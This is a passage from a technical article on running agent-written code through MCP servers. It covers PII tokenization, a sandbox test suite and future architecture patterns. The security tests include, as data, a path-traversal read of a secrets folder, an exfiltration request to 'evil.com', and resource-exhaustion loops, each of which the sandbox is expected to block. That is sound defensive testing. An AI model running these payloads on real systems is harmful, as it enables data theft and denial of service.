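    return restored;
  }
}

const tokenizer = new PiiTokenizer();
const first = tokenizer.tokenize("email", "ada@example.com");
const second = tokenizer.tokenize("email", "bob@example.com");
const repeat = tokenizer.tokenize("email", "ada@example.com");

console.log(first, second, repeat); // [EMAIL_1] [EMAIL_2] [EMAIL_1]
console.log(tokenizer.detokenize(`Send the invoice to ${first}`));
// Send the invoice to ada@example.com
```

Because the same input always maps to the same placeholder, the model can still reason about "the customer behind `[EMAIL_1]`" across steps without ever seeing the address itself.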

Quality Engineering and Testing

Code execution with MCP introduces new testing requirements beyond traditional MCP server validation. You need to test sandbox escape attempts, resource exhaustion scenarios, and execution correctness.

TYPESCRIPT

// Comprehensive test suite for code execution MCP server
describe('Code Execution MCP Server', () => {
  describe('Security Tests', () => {
    it('should prevent filesystem traversal attacks', async () => {
      const maliciousCode = `
        const fs = require('fs');
        return fs.readdirSync('../../secrets/');
      `;

      await expect(
        executeCode(maliciousCode)
      ).rejects.toThrow('Path access denied');
    });

    it('should prevent network access', async () => {
      const maliciousCode = `
        const https = require('https');
        return new Promise((resolve) => {
          https.get('https://evil.com/exfiltrate', resolve);
        });
      `;

      await expect(
        executeCode(maliciousCode)
      ).rejects.toThrow('Network access denied');
    });

    it('should enforce execution timeout', async () => {
      const infiniteLoop = `
        while(true) { /* infinite loop */ }
      `;

      const start = Date.now();
      await expect(
        executeCode(infiniteLoop)
      ).rejects.toThrow('Execution timeout');

      const duration = Date.now() - start;
      expect(duration).toBeLessThan(6000); // 5s timeout + 1s buffer
    });

    it('should enforce memory limits', async () => {
      const memoryExhaustion = `
        const arrays = [];
        while(true) {
          arrays.push(new Array(1000000).fill('x'));
        }
      `;

      await expect(
        executeCode(memoryExhaustion)
      ).rejects.toThrow('Memory limit exceeded');
    });
  });

  describe('Correctness Tests', () => {
    it('should execute valid data transformations', async () => {
      const code = `
        const data = [1, 2, 3, 4, 5];
        return data
          .filter(x => x % 2 === 0)
          .map(x => x * 2);
      `;

      const result = await executeCode(code);
      expect(result).toEqual([4, 8]);
    });

    it('should preserve execution context across calls', async () => {
      // First execution sets state
      await executeCode(`
        mcp.state.counter = 0;
      `);

      // Second execution reads state
      const result = await executeCode(`
        return ++mcp.state.counter;
      `);

      expect(result).toBe(1);
    });
  });

  describe('Performance Tests', () => {
    it('should complete execution within latency budget', async () => {
      const code = `
        const fs = require('fs');
        const files = fs.readdirSync('./data');
        return files.filter(f => f.endsWith('.json'));
      `;

      const start = Date.now();
      await executeCode(code);
      const duration = Date.now() - start;

      // Execution should complete in <100ms
      expect(duration).toBeLessThan(100);
    });

    it('should handle concurrent executions', async () => {
      const executions = Array(100).fill(null).map((_, i) =>
        executeCode(`return ${i} * 2;`)
      );

      const results = await Promise.all(executions);

      // Verify all executions completed correctly
      results.forEach((result, i) => {
        expect(result).toBe(i * 2);
      });
    });
  });

  describe('Integration Tests', () => {
    it('should integrate with MCP filesystem resources', async () => {
      const code = `
        // Access filesystem through MCP resource API
        const content = await mcp.resources.read(
          'file:///data/config.json'
        );
        return JSON.parse(content);
      `;

      const result = await executeCode(code);
      expect(result).toHaveProperty('apiKey');
    });

    it('should integrate with MCP database tools', async () => {
      const code = `
        // Query database through MCP tool API
        const users = await mcp.tools.call('db_query', {
          sql: 'SELECT COUNT(*) FROM users WHERE active = true'
        });
        return users[0].count;
      `;

      const result = await executeCode(code);
      expect(typeof result).toBe('number');
    });
  });
});

Future Implications for MCP Infrastructure

Code execution with MCP isn't just an optimization technique—it's a fundamental shift in how we should think about MCP server architecture. The implications extend far beyond token reduction.

Future Architecture Patterns

Composable MCP Capabilities

Code execution enables agents to compose capabilities dynamically rather than requiring pre-defined tool combinations

Higher-Level Abstractions

Build libraries of reusable code patterns that agents can leverage without tool schema overhead

Stateful Agent Workflows

Maintain execution state across multi-step operations without bloating conversation history

Edge Computing Patterns

Process data closer to its source, transmitting only insights to the model rather than raw data

As MCP ecosystems mature, we'll see code execution become a standard capability rather than an advanced pattern. The 98.7% token reduction in Anthropic's example is more than an impressive number: savings of that order matter economically for complex multi-agent systems operating at scale.

The challenge for infrastructure teams is implementing secure, performant code execution environments before they become a competitive requirement. Organizations that master this pattern early will have significant advantages in building sophisticated AI systems that remain cost-effective at scale.
